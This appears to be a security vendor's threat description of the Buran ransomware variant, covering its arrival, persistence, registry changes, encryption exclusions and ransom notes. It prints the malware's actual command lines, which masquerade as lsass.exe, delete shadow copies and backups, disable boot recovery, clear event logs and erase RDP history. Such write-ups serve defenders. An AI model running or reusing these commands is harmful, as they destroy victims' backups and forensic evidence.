Ransom.Win32.BURAN.WGL

This Ransomware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

It executes then deletes itself afterward.

It drops files as ransom note.

Arrival Details

This Ransomware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Ransomware drops the following copies of itself into the affected system:

• %Application Data%\Microsoft\Windows\lsass.exe

(Note: %Application Data% is the current user's Application Data folder, which is usually C:\Documents and Settings\{user name}\Application Data on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\AppData\Roaming on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).)

It adds the following processes:

• %System%\cmd.exe" /e:on /c md "%Applicatyion Data%\Microsoft\Windows" & copy "%Desktop%\{Malware Name}.exe" "%Application Data%\Microsoft\Windows\lsass.exe" & reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Local Security Authority Subsystem Service" /t REG_SZ /F /D "\"%Application Data%\Microsoft\Windows\lsass.exe\" *"
• reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Local Security Authority Subsystem Service" /t REG_SZ /F /D "\"%Application Data%\Microsoft\Windows\lsass.exe\" *"
• "%Application Data%\Microsoft\Windows\lsass.exe" *
• ping -n 3 127.1
• "%System%\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
• bcdedit /set {default} bootstatuspolicy ignoreallfailures
• "%System%\cmd.exe" /C bcdedit /set {default} recoveryenabled no
• bcdedit /set {default} recoveryenabled no
• "%System%\cmd.exe" /C wbadmin delete catalog -quiet
• wbadmin delete catalog -quiet
• "%System%\cmd.exe" /C wbadmin delete systemstatebackup
• wbadmin delete systemstatebackup
• "%System%\cmd.exe" /C wbadmin delete systemstatebackup -keepversions:0
• wbadmin delete systemstatebackup -keepversions:0
• "%System%\cmd.exe" /C wbadmin delete backup
• wbadmin delete backup
• "%System%\cmd.exe" /C wmic shadowcopy delete
• wmic shadowcopy delete
• "%System%\cmd.exe" /C vssadmin delete shadows /all /quiet
• vssadmin delete shadows /all /quiet
• "%System%\cmd.exe" /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
• reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
• /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
• reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
• /C reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
• reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
• "%System%\cmd.exe" /C attrib "%userprofile%\documents\Default.rdp" -s -h
• attrib "%User Profile%\documents\Default.rdp" -s -h
• "%System%\cmd.exe" /C del "%userprofile%\documents\Default.rdp"
• "%System%\cmd.exe" /C wevtutil.exe clear-log Application
• wevtutil.exe clear-log Application
• "%System%\cmd.exe" /C wevtutil.exe clear-log Security
• wevtutil.exe clear-log Security
• "%System%\cmd.exe" /C wevtutil.exe clear-log System
• wevtutil.exe clear-log System
• "%System%\cmd.exe" /C sc config eventlog start=disabled
• sc config eventlog start=disabled
• "%System%\notepad.exe" %Desktop%\!!! YOUR FILES ARE ENCRYPTED !!!.TXT
• "%System%\cmd.exe" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del "%Desktop%\buran.exe" & if not exist "%Desktop%\buran.exe" exit )
• "%System%\cmd.exe" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del "%Application Data%\Microsoft\Windows\lsass.exe" & if not exist %Application Data%\Microsoft\Windows\lsass.exe" exit )

(Note: %Application Data% is the current user's Application Data folder, which is usually C:\Documents and Settings\{user name}\Application Data on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\AppData\Roaming on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).. %User Profile% is the current user's profile folder, which is usually C:\Documents and Settings\{user name} on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name} on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).)

It executes then deletes itself afterward.

It leaves text files that serve as ransom notes containing the following:

Autostart Technique

This Ransomware adds the following registry entries to enable its automatic execution at every system startup:

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Run
Local Security Authority Subsystem Service = ""%Application Data%\Microsoft\Windows\lsass.exe" *"

Other System Modifications

This Ransomware adds the following registry keys:

HKEY_CURRENT_USER\Software\Buran III

HKEY_CURRENT_USER\Software\Buran III\
Service

HKEY_LOCAL_MACHINE\BCD00000000\Objects\
{GUID}\Elements\250000e0

HKEY_CURRENT_USER\Software\Microsoft\
Terminal Server Client

HKEY_CURRENT_USER\Software\Microsoft\
Terminal Server Client\Servers

It adds the following registry entries:

HKEY_CURRENT_USER\Software\Buran III
Knock = "666"

HKEY_CURRENT_USER\Software\Buran III\
Service
Public Key = ""

HKEY_CURRENT_USER\Software\Buran III\
Service
Machine ID = ""

HKEY_CURRENT_USER\Software\Microsoft\
Notepad
iWindowPosX = "164"

HKEY_CURRENT_USER\Software\Microsoft\
Notepad
iWindowPosY = "100"

HKEY_CURRENT_USER\Software\Microsoft\
Notepad
iWindowPosDX = "716"

HKEY_CURRENT_USER\Software\Microsoft\
Notepad
iWindowPosDY = "638"

Other Details

This Ransomware connects to the following URL(s) to get the affected system's IP address:

• geoiptool.com
• iplogger.ru
• iplogger.org

It does the following:

• It avoids encrypting files with the following file extension:
  
  • .cmd
  • .com
  • .cpl
  • .dll
  • .msc
  • .msp
  • .pif
  • .scr
  • .sys
  • .log
  • .exe
  • .lnk
  • .buran
• It also encrypts files in shared folders.

Ransomware Routine

This Ransomware avoids encrypting files with the following strings in their file name:

• bootfont.bin
• bootsect.bak
• desktop.ini
• ctfmon.exe
• iconcache.db
• master.exe
• master.dat
• ntdetect.com
• ntldr
• ntuser.dat
• ntuser.dat.log
• ntuser.ini
• thumbs.db
• !!! your files are encrypted !!!.txt

It avoids encrypting files with the following strings in their file path:

• :\$recycle.bin\
• :\$windows.~bt\
• :\recycler
• :\system volume information\
• :\windows.old
• :\windows\
• :\intel\
• :\nvidia\
• :\inetpub\logs\
• \appdata\
• \apple computer\safari\
• \application data\
• \boot\
• \google\
• \google\chrome\
• \mozilla firefox\
• \mozilla\
• \opera software\
• \opera\
• \tor browser\
• \common files\
• \internet explorer\
• \windows defender\
• \windows mail\
• \windows media player\
• \windows multimedia platform\
• \windows nt\
• \windows photo viewer\
• \windows portable devices\
• \windowspoershell\
• \windows security\
• \embedded lockdown manager\
• \windows journal\
• \msbuild\
• \reference assemblies\
• \windows sidebar\
• \windows defender advanced threat protection\
• \microsoft\
• \package cache\
• \microsoft help\
• \desktop\
• %Windows%

(Note: %Windows% is the Windows folder, where it usually is C:\Windows on all Windows operating system versions.)

It appends the following extension to the file name of the encrypted files:

• .{GUID}

It drops the following file(s) as ransom note:

• {Encrypted Directory}:\!!! YOUR FILES ARE ENCRYPTED !!!.TXT
• %Desktop%\:\!!! YOUR FILES ARE ENCRYPTED !!!.TXT

(Note: %Desktop% is the current user's desktop, which is usually C:\Documents and Settings\{User Name}\Desktop on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\Desktop on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).)